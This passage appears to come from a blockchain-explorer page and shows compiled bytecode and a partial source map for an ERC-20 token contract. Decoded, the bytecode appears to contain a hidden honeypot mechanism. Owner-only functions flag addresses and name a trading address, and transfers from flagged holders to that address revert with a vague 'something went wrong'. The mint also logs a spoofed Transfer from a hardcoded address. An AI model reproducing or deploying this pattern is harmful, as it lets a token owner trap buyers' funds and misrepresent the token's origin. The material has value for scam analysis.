00808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610ef8919061158e565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f5c919061153c565b60405180910390a350505050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561104d57600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661104c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611043906114dc565b60405180910390fd5b5b505050565b600081359050611061816119ea565b92915050565b60008135905061107681611a01565b92915050565b60008135905061108b81611a18565b92915050565b6000602082840312156110a7576110a6611730565b5b60006110b584828501611052565b91505092915050565b600080604083850312156110d5576110d4611730565b5b60006110e385828601611052565b92505060206110f485828601611052565b9150509250929050565b60008060006060848603121561111757611116611730565b5b600061112586828701611052565b935050602061113686828701611052565b92505060406111478682870161107c565b9150509250925092565b6000806040838503121561116857611167611730565b5b600061117685828601611052565b925050602061118785828601611067565b9150509250929050565b600080604083850312156111a8576111a7611730565b5b60006111b685828601611052565b92505060206111c78582860161107c565b9150509250929050565b6111da81611618565b82525050565b6111e98161162a565b82525050565b60006111fa82611572565b611204818561157d565b935061121481856020860161166d565b61121d81611735565b840191505092915050565b600061123560238361157d565b915061124082611746565b604082019050919050565b600061125860228361157d565b915061126382611795565b604082019050919050565b600061127b60268361157d565b9150611286826117e4565b604082019050919050565b600061129e60288361157d565b91506112a982611833565b604082019050919050565b60006112c160208361157d565b91506112cc82611882565b602082019050919050565b60006112e460258361157d565b91506112ef826118ab565b604082019050919050565b600061130760248361157d565b9150611312826118fa565b604082019050919050565b600061132a60148361157d565b915061133582611949565b602082019050919050565b600061134d60258361157d565b915061135882611972565b604082019050919050565b6000611370601f8361157d565b915061137b826119c1565b602082019050919050565b61138f81611656565b82525050565b61139e81611660565b82525050565b60006020820190506113b960008301846111d1565b92915050565b60006020820190506113d460008301846111e0565b92915050565b600060208201905081810360008301526113f481846111ef565b905092915050565b6000602082019050818103600083015261141581611228565b9050919050565b600060208201905081810360008301526114358161124b565b9050919050565b600060208201905081810360008301526114558161126e565b9050919050565b6000602082019050818103600083015261147581611291565b9050919050565b60006020820190508181036000830152611495816112b4565b9050919050565b600060208201905081810360008301526114b5816112d7565b9050919050565b600060208201905081810360008301526114d5816112fa565b9050919050565b600060208201905081810360008301526114f58161131d565b9050919050565b6000602082019050818103600083015261151581611340565b9050919050565b6000602082019050818103600083015261153581611363565b9050919050565b60006020820190506115516000830184611386565b92915050565b600060208201905061156c6000830184611395565b92915050565b600081519050919050565b600082825260208201905092915050565b600061159982611656565b91506115a483611656565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156115d9576115d86116d2565b5b828201905092915050565b60006115ef82611656565b91506115fa83611656565b92508282101561160d5761160c6116d2565b5b828203905092915050565b600061162382611636565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561168b578082015181840152602081019050611670565b8381111561169a576000848401525b50505050565b600060028204905060018216806116b857607f821691505b602082108114156116cc576116cb611701565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f736f6d657468696e672077656e742077726f6e67000000000000000000000000600082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6119f381611618565b81146119fe57600080fd5b50565b611a0a8161162a565b8114611a1557600080fd5b50565b611a2181611656565b8114611a2c57600080fd5b5056fea264697066735822122077151bb36a1e05e254129f878b95511214580b2940e9648b2a4720e6ae7ff4e964736f6c63430008070033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c806378051f4d1161008c578063a457c2d711610066578063a457c2d714610261578063a8b28c4314610291578063a9059cbb146102ad578063dd62ed3e146102dd576100ea565b806378051f4d146102095780638da5cb5b1461022557806395d89b4114610243576100ea565b806323b872dd116100c857806323b872dd1461015b578063313ce5671461018b57806339509351146101a957806370a08231146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f761030d565b60405161010491906113da565b60405180910390f35b61012760048036038101906101229190611191565b61039f565b60405161013491906113bf565b60405180910390f35b6101456103bd565b604051610152919061153c565b60405180910390f35b610175600480360381019061017091906110fe565b6103c7565b60405161018291906113bf565b60405180910390f35b6101936104c8565b6040516101a09190611557565b60405180910390f35b6101c360048036038101906101be9190611191565b6104d1565b6040516101d091906113bf565b60405180910390f35b6101f360048036038101906101ee9190611091565b61057d565b604051610200919061153c565b60405180910390f35b610223600480360381019061021e9190611091565b6105c5565b005b61022d610685565b60405161023a91906113a4565b60405180910390f35b61024b6106af565b60405161025891906113da565b60405180910390f35b61027b60048036038101906102769190611191565b610741565b60405161028891906113bf565b60405180910390f35b6102ab60048036038101906102a69190611151565b610835565b005b6102c760048036038101906102c29190611191565b61090c565b6040516102d491906113bf565b60405180910390f35b6102f760048036038101906102f291906110be565b61092a565b604051610304919061153c565b60405180910390f35b60606003805461031c906116a0565b80601f0160208091040260200160405190810160405280929190818152602001828054610348906116a0565b80156103955780601f1061036a57610100808354040283529160200191610395565b820191906000526020600020905b81548152906001019060200180831161037857829003601f168201915b5050505050905090565b60006103b36103ac610b18565b8484610b20565b6001905092915050565b6000600254905090565b60006103d4848484610ceb565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061041f610b18565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561049f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104969061145c565b60405180910390fd5b6104bc856104ab610b18565b85846104b791906115e4565b610b20565b60019150509392505050565b60006012905090565b60006105736104de610b18565b8484600160006104ec610b18565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461056e919061158e565b610b20565b6001905092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105cd610b18565b73ffffffffffffffffffffffffffffffffffffffff166105eb610685565b73ffffffffffffffffffffffffffffffffffffffff1614610641576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106389061147c565b60405180910390fd5b80600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600480546106be906116a0565b80601f01602080910402602001604051908101604052809291908181526020018280546106ea906116a0565b80156107375780601f1061070c57610100808354040283529160200191610737565b820191906000526020600020905b81548152906001019060200180831161071a57829003601f168201915b5050505050905090565b60008060016000610750610b18565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561080d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610804906114fc565b60405180910390fd5b61082a610818610b18565b85858461082591906115e4565b610b20565b600191505092915050565b61083d610b18565b73ffffffffffffffffffffffffffffffffffffffff1661085b610685565b73ffffffffffffffffffffffffffffffffffffffff16146108b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a89061147c565b60405180910390fd5b80600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6000610920610919610b18565b8484610ceb565b6001905092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610a21576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a189061151c565b60405180910390fd5b610a2d60008383610f6a565b8060026000828254610a3f919061158e565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610a94919061158e565b925050819055508173ffffffffffffffffffffffffffffffffffffffff1673378ddb6914e32c4d9c0e08881d460ee9c6c73b8273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610b0c919061153c565b60405180910390a35050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b87906114bc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c00576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf79061141c565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cde919061153c565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d5b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d529061149c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610dcb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc2906113fc565b60405180910390fd5b610dd6838383610f6a565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e539061143c565b60405180910390fd5b8181610e6891906115e4565b6000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610ef8919061158e565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f5c919061153c565b60405180910390a350505050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561104d57600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661104c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611043906114dc565b60405180910390fd5b5b505050565b600081359050611061816119ea565b92915050565b60008135905061107681611a01565b92915050565b60008135905061108b81611a18565b92915050565b6000602082840312156110a7576110a6611730565b5b60006110b584828501611052565b91505092915050565b600080604083850312156110d5576110d4611730565b5b60006110e385828601611052565b92505060206110f485828601611052565b9150509250929050565b60008060006060848603121561111757611116611730565b5b600061112586828701611052565b935050602061113686828701611052565b92505060406111478682870161107c565b9150509250925092565b6000806040838503121561116857611167611730565b5b600061117685828601611052565b925050602061118785828601611067565b9150509250929050565b600080604083850312156111a8576111a7611730565b5b60006111b685828601611052565b92505060206111c78582860161107c565b9150509250929050565b6111da81611618565b82525050565b6111e98161162a565b82525050565b60006111fa82611572565b611204818561157d565b935061121481856020860161166d565b61121d81611735565b840191505092915050565b600061123560238361157d565b915061124082611746565b604082019050919050565b600061125860228361157d565b915061126382611795565b604082019050919050565b600061127b60268361157d565b9150611286826117e4565b604082019050919050565b600061129e60288361157d565b91506112a982611833565b604082019050919050565b60006112c160208361157d565b91506112cc82611882565b602082019050919050565b60006112e460258361157d565b91506112ef826118ab565b604082019050919050565b600061130760248361157d565b9150611312826118fa565b604082019050919050565b600061132a60148361157d565b915061133582611949565b602082019050919050565b600061134d60258361157d565b915061135882611972565b604082019050919050565b6000611370601f8361157d565b915061137b826119c1565b602082019050919050565b61138f81611656565b82525050565b61139e81611660565b82525050565b60006020820190506113b960008301846111d1565b92915050565b60006020820190506113d460008301846111e0565b92915050565b600060208201905081810360008301526113f481846111ef565b905092915050565b6000602082019050818103600083015261141581611228565b9050919050565b600060208201905081810360008301526114358161124b565b9050919050565b600060208201905081810360008301526114558161126e565b9050919050565b6000602082019050818103600083015261147581611291565b9050919050565b60006020820190508181036000830152611495816112b4565b9050919050565b600060208201905081810360008301526114b5816112d7565b9050919050565b600060208201905081810360008301526114d5816112fa565b9050919050565b600060208201905081810360008301526114f58161131d565b9050919050565b6000602082019050818103600083015261151581611340565b9050919050565b6000602082019050818103600083015261153581611363565b9050919050565b60006020820190506115516000830184611386565b92915050565b600060208201905061156c6000830184611395565b92915050565b600081519050919050565b600082825260208201905092915050565b600061159982611656565b91506115a483611656565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156115d9576115d86116d2565b5b828201905092915050565b60006115ef82611656565b91506115fa83611656565b92508282101561160d5761160c6116d2565b5b828203905092915050565b600061162382611636565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561168b578082015181840152602081019050611670565b8381111561169a576000848401525b50505050565b600060028204905060018216806116b857607f821691505b602082108114156116cc576116cb611701565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f736f6d657468696e672077656e742077726f6e67000000000000000000000000600082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6119f381611618565b81146119fe57600080fd5b50565b611a0a8161162a565b8114611a1557600080fd5b50565b611a2181611656565b8114611a2c57600080fd5b5056fea264697066735822122077151bb36a1e05e254129f878b95511214580b2940e9648b2a4720e6ae7ff4e964736f6c63430008070033

Deployed Bytecode Sourcemap

17139:988:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8327:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10494:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9447:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11145:422;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9289:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11976:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9618:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17824:88;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2035:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8546:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12694:377;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17715:103;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9958:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10196:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8327:100;8381:13;8414:5;8407:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8327:100;:::o;10494:169::-;10577:4;10594:39;10603:12;:10;:12::i;:::-;10617:7;10626:6;10594:8;:39::i;:::-;10651:4;10644:11;;10494:169;;;;:::o;9447:108::-;9508:7;9535:12;;9528:19;;9447:108;:::o;11145:422::-;11251:4;11268:36;11278:6;11286:9;11297:6;11268:9;:36::i;:::-;11317:24;11344:11;:19;11356:6;11344:19;;;;;;;;;;;;;;;:33;11364:12;:10;:12::i;:::-;11344:33;;;;;;;;;;;;;;;;11317:60;;11416:6;11396:16;:26;;11388:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;11478:57;11487:6;11495:12;:10;:12::i;:::-;11528:6;11509:16;:25;;;;:::i;:::-;11478:8;:57::i;:::-;11555:4;11548:11;;;11145:422;;;;;:::o;9289:93::-;9347:5;9372:2;9365:9;;9289:93;:::o;11976:215::-;12064:4;12081:80;12090:12;:10;:12::i;:::-;12104:7;12150:10;12113:11;:25;12125:12;:10;:12::i;:::-;12113:25;;;;;;;;;;;;;;;:34;12139:7;12113:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;12081:8;:80::i;:::-;12179:4;12172:11;;11976:215;;;;:::o;9618:127::-;9692:7;9719:9;:18;9729:7;9719:18;;;;;;;;;;;;;;;;9712:25;;9618:127;;;:::o;17824:88::-;2266:12;:10;:12::i;:::-;2255:23;;:7;:5;:7::i;:::-;:23;;;2247:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17900:4:::1;17893;;:11;;;;;;;;;;;;;;;;;;17824:88:::0;:::o;2035:87::-;2081:7;2108:6;;;;;;;;;;;2101:13;;2035:87;:::o;8546:104::-;8602:13;8635:7;8628:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8546:104;:::o;12694:377::-;12787:4;12804:24;12831:11;:25;12843:12;:10;:12::i;:::-;12831:25;;;;;;;;;;;;;;;:34;12857:7;12831:34;;;;;;;;;;;;;;;;12804:61;;12904:15;12884:16;:35;;12876:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;12972:67;12981:12;:10;:12::i;:::-;12995:7;13023:15;13004:16;:34;;;;:::i;:::-;12972:8;:67::i;:::-;13059:4;13052:11;;;12694:377;;;;:::o;17715:103::-;2266:12;:10;:12::i;:::-;2255:23;;:7;:5;:7::i;:::-;:23;;;2247:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17804:6:::1;17788:7;:13;17796:4;17788:13;;;;;;;;;;;;;;;;:22;;;;;;;;;;;;;;;;;;17715:103:::0;;:::o;9958:175::-;10044:4;10061:42;10071:12;:10;:12::i;:::-;10085:9;10096:6;10061:9;:42::i;:::-;10121:4;10114:11;;9958:175;;;;:::o;10196:151::-;10285:7;10312:11;:18;10324:5;10312:18;;;;;;;;;;;;;;;:27;10331:7;10312:27;;;;;;;;;;;;;;;;10305:34;;10196:151;;;;:::o;14447:379::-;14550:1;14531:21;;:7;:21;;;;14523:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;14601:49;14630:1;14634:7;14643:6;14601:20;:49::i;:::-;14679:6;14663:12;;:22;;;;;;;:::i;:::-;;;;;;;;14718:6;14696:9;:18;14706:7;14696:18;;;;;;;;;;;;;;;;:28;;;;;;;:::i;:::-;;;;;;;;14802:7;14740:78;;14757:42;14740:78;;;14811:6;14740:78;;;;;;:::i;:::-;;;;;;;;14447:379;;:::o;608:98::-;661:7;688:10;681:17;;608:98;:::o;16091:346::-;16210:1;16193:19;;:5;:19;;;;16185:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16291:1;16272:21;;:7;:21;;;;16264:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16375:6;16345:11;:18;16357:5;16345:18;;;;;;;;;;;;;;;:27;16364:7;16345:27;;;;;;;;;;;;;;;:36;;;;16413:7;16397:32;;16406:5;16397:32;;;16422:6;16397:32;;;;;;:::i;:::-;;;;;;;;16091:346;;;:::o;13561:604::-;13685:1;13667:20;;:6;:20;;;;13659:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;13769:1;13748:23;;:9;:23;;;;13740:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;13824:47;13845:6;13853:9;13864:6;13824:20;:47::i;:::-;13884:21;13908:9;:17;13918:6;13908:17;;;;;;;;;;;;;;;;13884:41;;13961:6;13944:13;:23;;13936:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;14057:6;14041:13;:22;;;;:::i;:::-;14021:9;:17;14031:6;14021:17;;;;;;;;;;;;;;;:42;;;;14098:6;14074:9;:20;14084:9;14074:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;14139:9;14122:35;;14131:6;14122:35;;;14150:6;14122:35;;;;;;:::i;:::-;;;;;;;;13648:517;13561:604;;;:::o;17920:204::-;18038:4;;;;;;;;;;;18032:10;;:2;:10;;;18029:88;;;18067:7;:13;18075:4;18067:13;;;;;;;;;;;;;;;;;;;;;;;;;18059:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;18029:88;17920:204;;;:::o;7:139:1:-;53:5;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;7:139;;;;:::o;152:133::-;195:5;233:6;220:20;211:29;;249:30;273:5;249:30;:::i;:::-;152:133;;;;:::o;291:139::-;337:5;375:6;362:20;353:29;;391:33;418:5;391:33;:::i;:::-;291:139;;;;:::o;436:329::-;495:6;544:2;532:9;523:7;519:23;515:32;512:119;;;550:79;;:::i;:::-;512:119;670:1;695:53;740:7;731:6;720:9;716:22;695:53;:::i;:::-;685:63;;641:117;436:329;;;;:::o;771:474::-;839:6;847;896:2;884:9;875:7;871:23;867:32;864:119;;;902:79;;:::i;:::-;864:119;1022:1;1047:53;1092:7;1083:6;1072:9;1068:22;1047:53;:::i;:::-;1037:63;;993:117;1149:2;1175:53;1220:7;1211:6;1200:9;1196:22;1175:53;:::i;:::-;1165:63;;1120:118;771:474;;;;;:::o;1251:619::-;1328:6;1336;1344;1393:2;1381:9;1372:7;1368:23;1364:32;1361:119;;;1399:79;;:::i;:::-;1361:119;1519:1;1544:53;1589:7;1580:6;1569:9;1565:22;1544:53;:::i;:::-;1534:63;;1490:117;1646:2;1672:53;1717:7;1708:6;1697:9;1693:22;1672:53;:::i;:::-;1662:63;;1617:118;1774:2;1800:53;1845:7;1836:6;1825:9;1821:22;1800:53;:::i;:::-;1790:63;;1745:118;1251:619;;;;;:::o;1876:468::-;1941:6;1949;1998:2;1986:9;1977:7;1973:23;1969:32;1966:119;;;2004:79;;:::i;:::-;1966:119;2124:1;2149:53;2194:7;2185:6;2174:9;2170:22;2149:53;:::i;:::-;2139:63;;2095:117;2251:2;2277:50;2319:7;2310:6;2299:9;2295:22;2277:50;:::i;:::-;2267:60;;2222:115;1876:468;;;;;:::o;2350:474::-;2418:6;2426;2475:2;2463:9;2454:7;2450:23;2446:32;2443:119;;;2481:79;;:::i;:::-;2443:119;2601:1;2626:53;2671:7;2662:6;2651:9;2647:22;2626:53;:::i;:::-;2616:63;;2572:117;2728:2;2754:53;2799:7;2790:6;2779:9;2775:22;2754:53;:::i;:::-;2744:63;;2699:118;2350:474;;;;;:::o;2830:118::-;2917:24;2935:5;2917:24;:::i;:::-;2912:3;2905:37;2830:118;;:::o;2954:109::-;3035:21;3050:5;3035:21;:::i;:::-;3030:3;3023:34;2954:109;;:::o;3069:364::-;3157:3;3185:39;3218:5;3185:39;:::i;:::-;3240:71;3304:6;3299:3;3240:71;:::i;:::-;3233:78;;3320:52;3365:6;3360:3;3353:4;3346:5;3342:16;3320:52;:::i;:::-;3397:29;3419:6;3397:29;:::i;:::-;3392:3;3388:39;3381:46;;3161:272;3069:364;;;;:::o;3439:366::-;3581:3;3602:67;3666:2;3661:3;3602:67;:::i;:::-;3595:74;;3678:93;3767:3;3678:93;:::i;:::-;3796:2;3791:3;3787:12;3780:19;;3439:366;;;:::o;3811:::-;3953:3;3974:67;4038:2;4033:3;3974:67;:::i;:::-;3967:74;;4050:93;4139:3;4050:93;:::i;:::-;4168:2;4163:3;4159:12;4152:19;;3811:366;;;:::o;4183:::-;4325:3;4346:67;4410:2;4405:3;4346:67;:::i;:::-;4339:74;;4422:93;4511:3;4422:93;:::i;:::-;4540:2;4535:3;4531:12;4524:19;;4183:366;;;:::o;4555:::-;4697:3;4718:67;4782:2;4777:3;4718:67;:::i;:::-;4711:74;;4794:93;4883:3;4794:93;:::i;:::-;4912:2;4907:3;4903:12;4896:19;;4555:366;;;:::o;4927:::-;5069:3;5090:67;5154:2;5149:3;5090:67;:::i;:::-;5083:74;;5166:93;5255:3;5166:93;:::i;:::-;5284:2;5279:3;5275:12;5268:19;;4927:366;;;:::o;5299:::-;5441:3;5462:67;5526:2;5521:3;5462:67;:::i;:::-;5455:74;;5538:93;5627:3;5538:93;:::i;:::-;5656:2;5651:3;5647:12;5640:19;;5299:366;;;:::o;5671:::-;5813:3;5834:67;5898:2;5893:3;5834:67;:::i;:::-;5827:74;;5910:93;5999:3;5910:93;:::i;:::-;6028:2;6023:3;6019:12;6012:19;;5671:366;;;:::o;6043:::-;6185:3;6206:67;6270:2;6265:3;6206:67;:::i;:::-;6199:74;;6282:93;6371:3;6282:93;:::i;:::-;6400:2;6395:3;6391:12;6384:19;;6043:366;;;:::o;6415:::-;6557:3;6578:67;6642:2;6637:3;6578:67;:::i;:::-;6571:74;;6654:93;6743:3;6654:93;:::i;:::-;6772:2;6767:3;6763:12;6756:19;;6415:366;;;:::o;6787:::-;6929:3;6950:67;7014:2;7009:3;6950:67;:::i;:::-;6943:74;;7026:93;7115:3;7026:93;:::i;:::-;7144:2;7139:3;7135:12;7128:19;;6787:366;;;:::o;7159:118::-;7246:24;7264:5;7246:24;:::i;:::-;7241:3;7234:37;7159:118;;:::o;7283:112::-;7366:22;7382:5;7366:22;:::i;:::-;7361:3;7354:35;7283:112;;:::o;7401:222::-;7494:4;7532:2;7521:9;7517:18;7509:26;;7545:71;7613:1;7602:9;7598:17;7589:6;7545:71;:::i;:::-;7401:222;;;;:::o;7629:210::-;7716:4;7754:2;7743:9;7739:18;7731:26;;7767:65;7829:1;7818:9;7814:17;7805:6;7767:65;:::i;:::-;7629:210;;;;:::o;7845:313::-;7958:4;7996:2;7985:9;7981:18;7973:26;;8045:9;8039:4;8035:20;8031:1;8020:9;8016:17;8009:47;8073:78;8146:4;8137:6;8073:78;:::i;:::-;8065:86;;7845:313;;;;:::o;8164:419::-;8330:4;8368:2;8357:9;8353:18;8345:26;;8417:9;8411:4;8407:20;8403:1;8392:9;8388:17;8381:47;8445:131;8571:4;8445:131;:::i;:::-;8437:139;;8164:419;;;:::o;8589:::-;8755:4;8793:2;8782:9;8778:18;8770:26;;8842:9;8836:4;8832:20;8828:1;8817:9;8813:17;8806:47;8870:131;8996:4;8870:131;:::i;:::-;8862:139;;8589:419;;;:::o;9014:::-;9180:4;9218:2;9207:9;9203:18;9195:26;;9267:9;9261:4;9257:20;9253:1;